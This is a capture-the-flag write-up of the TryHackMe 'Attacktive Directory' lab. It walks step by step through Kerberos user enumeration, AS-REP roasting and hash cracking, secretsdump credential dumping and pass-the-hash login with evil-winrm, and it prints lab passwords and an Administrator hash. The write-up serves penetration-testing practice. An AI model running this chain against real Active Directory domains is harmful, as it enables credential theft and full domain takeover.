【THM】Attacktive Directory-Practice
hihopkc. The TryHackMe room this writeup covers: https://tryhackme.com/room/attacktivedirectory
Difficulty: Medium
```bash
# Full TCP port scan with default scripts and service/version detection
nmap -p- -sC -sV -T4 10.10.245.159
```
Task 3 Welcome to Attacktive Directory
What tool will allow us to enumerate port 139/445?
What is the NetBIOS-Domain Name of the machine?
What invalid TLD do people commonly use for their Active Directory Domain?
The next step is enumerating the two ports used by AD, *139* and *445*, with enum4linux. The `-a` flag stands for "all simple enumeration": it gathers the user list, machine list(s), share list, password policy information, group and member lists, and more.
Task 4 Enumerating Users via Kerberos
A whole host of other services are running, including Kerberos (port 88). Kerberos is the key authentication service within Active Directory. With this port open we can use a tool called Kerbrute (by Ronnie Flathers, @ropnop) to brute-force user discovery, brute-force passwords, and even password spray.
```bash
# Enumerate valid usernames against the DC; the domain is spookysec.local,
# the same realm used in the GetNPUsers.py command in Task 5
./kerbrute_linux_amd64 userenum --dc=10.10.245.159 -d=spookysec.local userlist.txt
```
I saved the usernames into another file to make things easier.
Task 5 Abusing Kerberos
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASREPRoasting is possible when a user account has the "Does not require Kerberos pre-authentication" flag set. This means the KDC will return an AS-REP for that account without the requester first proving knowledge of the account's password; part of that reply is encrypted with a key derived from the password, so it can be taken away and cracked offline.
Impacket has a tool called "GetNPUsers.py" (located in impacket/examples/GetNPUsers.py) that queries the Key Distribution Center for ASREPRoastable accounts. The only thing needed is a list of valid usernames, which we enumerated previously with Kerbrute.
```bash
# Request AS-REPs for every user in validusers.txt without supplying a password;
# accounts with pre-authentication disabled return a crackable $krb5asrep$ hash
python /opt/impacket/examples/GetNPUsers.py -usersfile validusers.txt -no-pass -dc-ip 10.10.245.159 spookysec.local/
```
So only *svc-admin* can request a ticket without providing its password. Let's grab the hash we were given and identify its type (and the matching hashcat mode) on the example-hashes page at hashcat.net.
hashcat did not crack it on my machine (still to be analysed):

```bash
# Kerberos 5 AS-REP etype 23 hashes ($krb5asrep$23$...) are hashcat mode 18200
hashcat -m 18200 hash.txt passwordlist.txt
```

It printed:

Device #1: Not enough allocatable device memory for this attack.

But I am running on Windows. That message means the OpenCL device hashcat selected has too little memory for this mode; a commonly suggested workaround is to force the CPU device type with `-D 1`, or to lower the workload profile with `-w 1`.

Cracked password for svc-admin: management2005
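Tasks 4 and 5 both produce tool output that has to be filtered by hand before the next step: kerbrute's hits become validusers.txt, and the `$krb5asrep$` line from GetNPUsers.py becomes hash.txt with the right hashcat mode. The script below is an added example (not part of the original writeup or of either tool) that does that filtering; the kerbrute and GetNPUsers.py output in it is constructed to match the tools' line formats, and the hash bytes are placeholders rather than a real ticket.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): turn the kerbrute output from
# Task 4 into the validusers.txt list, then pick the AS-REP hash out of the
# GetNPUsers.py output from Task 5 and choose the hashcat mode from it.
# Both outputs below are constructed to match the tools' line formats; the
# hash bytes are placeholders, not a real ticket.

# kerbrute userenum prints one "[+] VALID USERNAME: user@domain" line per hit.
KERBRUTE_OUT='2024/01/01 10:00:00 >  [+] VALID USERNAME: james@spookysec.local
2024/01/01 10:00:00 >  [+] VALID USERNAME: svc-admin@spookysec.local
2024/01/01 10:00:01 >  [+] VALID USERNAME: backup@spookysec.local
2024/01/01 10:00:02 >  Done! Tested 100 usernames (3 valid) in 1.234 seconds'

# GetNPUsers.py (default -format hashcat) prints a $krb5asrep$<etype>$ line for
# each account that has "Do not require Kerberos preauthentication" set.
GETNPUSERS_OUT="[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
\$krb5asrep\$23\$svc-admin@SPOOKYSEC.LOCAL:0123456789abcdef0123456789abcdef\$00112233445566778899aabbccddeeff
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set"

# Bare usernames (no @domain) from kerbrute output on stdin, one per line.
valid_users() {
    grep -F 'VALID USERNAME:' | sed -E 's/.*VALID USERNAME:[[:space:]]*//' | cut -d@ -f1
}

# Only the AS-REP hash lines; the "[-] User ... doesn't have ..." lines are noise.
asrep_hashes() { grep '^\$krb5asrep\$'; }

# Account name embedded in the hash: the field after the etype, up to the colon.
asrep_account() { printf '%s' "$1" | cut -d'$' -f4 | cut -d: -f1; }

# hashcat mode from the etype field. 23 (RC4-HMAC) is -m 18200, the mode the
# writeup uses. Other etypes need a different mode, so return 1 rather than guess.
hashcat_mode() {
    case $(printf '%s' "$1" | cut -d'$' -f3) in
        23) echo 18200 ;;
        *)  return 1 ;;
    esac
}

main() {
    local users hashes h mode
    users=$(printf '%s\n' "$KERBRUTE_OUT" | valid_users)
    printf 'validusers.txt contents:\n%s\n\n' "$users"
    hashes=$(printf '%s\n' "$GETNPUSERS_OUT" | asrep_hashes)
    printf '%s\n' "$hashes" | while IFS= read -r h; do
        [ -n "$h" ] || continue
        if mode=$(hashcat_mode "$h"); then
            printf 'hash.txt <- %s\ncrack with: hashcat -m %s hash.txt passwordlist.txt\n' \
                "$(asrep_account "$h")" "$mode"
        else
            printf '%s: etype not handled here, check the hashcat example-hashes page\n' \
                "$(asrep_account "$h")"
        fi
    done
}
main
```

The mode lookup deliberately refuses anything other than etype 23: if the DC hands back an AES-encrypted AS-REP the hash starts with a different etype and `-m 18200` will simply never crack it, which is easy to mistake for a bad wordlist.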
Task 6 Back to the Basics
With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
```bash
# List the shares the DC offers to svc-admin (prompts for the password)
smbclient -L 10.10.245.159 -U "svc-admin"
```
Task 7 Elevating Privileges within the Domain
With our new credentials we can obtain a higher level of access. This backup account is the kind of account used to back up the whole domain controller: it is allowed to have all AD changes, including password hashes, replicated to it, which is exactly the right a DCSync-style dump relies on. We can use a different impacket tool, secretsdump.py, to retrieve every password hash this account is able to read.
```bash
# Dump domain credentials over DRSUAPI replication using the backup account
python /opt/impacket/examples/secretsdump.py backup:backup2517860@10.10.245.159
```
A quick search for how to move laterally with an NTLM hash leads to pass-the-hash: many tools accept the NT hash in place of the password, and evil-winrm does so through its `-H` option.
```bash
# Install evil-winrm, then authenticate to WinRM with the Administrator NT hash
gem install evil-winrm
evil-winrm -i 10.10.245.159 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
```